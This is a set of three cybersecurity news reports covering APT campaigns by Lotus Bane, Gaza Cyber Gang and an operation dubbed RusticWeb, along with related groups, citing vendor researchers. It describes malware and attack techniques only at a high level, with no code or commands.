Mar 06, 2024NewsroomCyber Attack / Malware

A financial entity in Vietnam was the target of a previously undocumented threat actor called Lotus Bane that was first detected in March 2023.

Singapore-headquartered Group-IB described the hacking outfit as an advanced persistent threat group that’s believed to have been active since at least 2022.

The exact specifics of the infection chain remain unknown as yet, but it involves the use of various malicious artifacts that serve as the stepping stone for the next-stage.

“The cybercriminals used methods such as DLL side-loading and data exchange via named pipes to run malicious executables and create remote scheduled tasks for lateral movement,” the company said.

Group-IB told The Hacker News that the techniques used by Lotus Bane overlap with that of OceanLotus, a Vietnam-aligned threat actor also known as APT32, Canvas Cyclone (formerly Bismuth), and Cobalt Kitty. This stems from the use of malware like PIPEDANCE for named pipes communication.

It’s worth noting that PIPEDANCE was first documented by Elastic Security Labs in February 2023 in connection with a cyber attack targeting an unnamed Vietnamese organization in late December 2022.

“This similarity suggests possible connections with or inspirations from OceanLotus, however, the different target industries make it likely that they are different,” Anastasia Tikhonova, head of Threat Intelligence for APAC at Group-IB, said.

“Lotus Bane is actively engaging in attacks primarily targeting the banking sector in the APAC region. Although the known attack was in Vietnam, the sophistication of their methods indicates the potential for broader geographical operations within APAC. The exact duration of their activity prior to this discovery is currently unclear, but ongoing investigations may shed more light on their history.”

The development comes as financial organizations across Asia-Pacific (APAC), Europe, Latin America (LATAM), and North America have been the target of several advanced persistent threat groups such as Blind Eagle and the Lazarus Group over the past year.

Another notable financially motivated threat group is UNC1945, which has been observed targeting ATM switch servers with the goal of infecting them with a custom malware called CAKETAP.

“This malware intercepts data transmitted from the ATM server to the [Hardware Security Module] server and checks it against a set of predefined conditions,” Group-IB said. “If these conditions are met, the data is altered before being sent out from the ATM server.”

UNC2891 and UNC1945 were previously detailed by Google-owned Mandiant in March 2022 as having deployed the CAKETAP rootkit on Oracle Solaris systems to intercept messages from an ATM switching network and perform unauthorized cash withdrawals at different banks using fraudulent cards.

“The presence and activities of both Lotus Bane and UNC1945 in the APAC region highlight the need for continued vigilance and robust cybersecurity measures,” Tikhonova said. “These groups, with their distinct tactics and targets, underline the complexity of protecting against financial cyber threats in today’s digital landscape.”

Dec 14, 2023NewsroomMalware / Threat Analysis

A pro-Hamas threat actor known as Gaza Cyber Gang is targeting Palestinian entities using an updated version of a backdoor dubbed Pierogi.

The findings come from SentinelOne, which has given the malware the name Pierogi++ owing to the fact that it’s implemented in the C++ programming language unlike its Delphi- and Pascal-based predecessor.

“Recent Gaza Cybergang activities show consistent targeting of Palestinian entities, with no observed significant changes in dynamics since the start of the Israel-Hamas war,” security researcher Aleksandar Milenkoski said in a report shared with The Hacker News.

Gaza Cyber Gang, believed to be active since at least 2012, has a history of striking targets throughout the Middle East, particularly Israel and Palestine, often leveraging spear-phishing as a method of initial access.

Some of the notable malware families in its arsenal include BarbWire, DropBook, LastConn, Molerat Loader, Micropsia, NimbleMamba, SharpStage, Spark, Pierogi, PoisonIvy, and XtremeRAT among others.

The threat actor is assessed to be a composite of several sub-groups that share overlapping victimology footprints and malware, such as Molerats, Arid Viper, and a cluster referred to as Operation Parliament by Kaspersky.

In recent months, the adversarial collective has been linked to a series of attacks that deliver improvised variants of its Micropsia and Arid Gopher implants as well as a new initial access downloader dubbed IronWind.

The latest set of intrusions mounted by Gaza Cyber Gang has been found to leverage Pierogi++ and Micropsia. The first recorded use of Pierogi++ goes back to late 2022.

Attack chains are characterized by the use of decoy documents written in Arabic or English and pertaining to matters of interest to Palestinians to deliver the backdoors.

Cybereason, which shed light on Pierogi in February 2020, described it as an implant that allows attackers to spy on targeted victims and that the “commands used to communicate with the [command-and-control] servers and other strings in the binary are written in Ukrainian.”

“The backdoor may have been obtained in underground communities rather than home-grown,” it assessed at the time.

Both Pierogi and Pierogi++ are equipped to take screenshots, execute commands, and download attacker-provided files. Another notable aspect is that the updated artifacts no longer feature any Ukrainian strings in the code.

SentinelOne’s investigation into Gaza Cyber Gang’s operations have also yielded tactical connections between two disparate campaigns referred to as Big Bang and Operation Bearded Barbie, in addition to reinforcing ties between the threat actor and WIRTE, as previously disclosed by Kaspersky in November 2021.

The sustained focus on Palestine notwithstanding, the discovery of Pierogi++ underscores that the group continues to refine and retool its malware to ensure successful compromise of targets and to maintain persistent access to their networks.

“The observed overlaps in targeting and malware similarities across the Gaza Cybergang sub-groups after 2018 suggests that the group has likely been undergoing a consolidation process,” Milenkoski said.

“This possibly includes the formation of an internal malware development and maintenance hub and/or streamlining supply from external vendors.”

Dec 22, 2023NewsroomMalware / Cyber Threat

Indian government entities and the defense sector have been targeted by a phishing campaign that’s engineered to drop Rust-based malware for intelligence gathering.

The activity, first detected in October 2023, has been codenamed Operation RusticWeb by enterprise security firm SEQRITE.

“New Rust-based payloads and encrypted PowerShell commands have been utilized to exfiltrate confidential documents to a web-based service engine, instead of a dedicated command-and-control (C2) server,” security researcher Sathwik Ram Prakki said.

Tactical overlaps have been uncovered between the cluster and those widely tracked under the monikers Transparent Tribe and SideCopy, both of which are assessed to be linked to Pakistan.

SideCopy is also a suspected subordinate element within Transparent Tribe. Last month, SEQRITE detailed multiple campaigns undertaken by the threat actor targeting Indian government bodies to deliver numerous trojans such as AllaKore RAT, Ares RAT, and DRat.

Other recent attack chains documented by ThreatMon have employed decoy Microsoft PowerPoint files as well as specially crafted RAR archives susceptible to CVE-2023-38831 for malware delivery, enabling unbridled remote access and control.

“The SideCopy APT Group’s infection chain involves multiple steps, each carefully orchestrated to ensure successful compromise,” ThreatMon noted earlier this year.

The latest set of attacks commences with a phishing email, leveraging social engineering techniques to trick victims into interacting with malicious PDF files that drop Rust-based payloads for enumerating the file system in the background while displaying the decoy file to the victim.

Besides amassing files of interest, the malware is equipped to collect system information and transmit them to the C2 server but lacks the features of other advanced stealer malware available in the cybercrime underground.

A second infection chain identified by SEQRITE in December employs a similar multi-stage process but substitutes the Rust malware with a PowerShell script that takes care of the enumeration and exfiltration steps.

But in an interesting twist, the final-stage payload is launched via a Rust executable that goes by the name “Cisco AnyConnect Web Helper.” The gathered information is ultimately uploaded to oshi[.]at domain, an anonymous public file-sharing engine called OshiUpload.

“Operation RusticWeb could be linked to an APT threat as it shares similarities with various Pakistan-linked groups,” Ram Prakki said.

The disclosure comes nearly two months after Cyble uncovered a malicious Android app utilized by the DoNot Team targeting individuals in the Kashmir region of India.

The nation-state actor, also known by the names APT-C-35, Origami Elephant, and SECTOR02, is believed to be of Indian origin and has a history of utilizing Android malware to infiltrate devices belonging to people in Kashmir and Pakistan.

The variant examined by Cyble is a trojanized version of an open-source GitHub project called “QuranApp: Read and Explore” that comes fitted with a wide range of spyware features to record audio and VoIP calls, capture screenshots, gather data from various apps, download additional APK files, and track the victim’s location.

“The DoNot group’s relentless efforts to refine their tools and techniques underscore the ongoing threat they pose, particularly in their targeting of individuals in the sensitive Kashmir region of India,” Cyble said.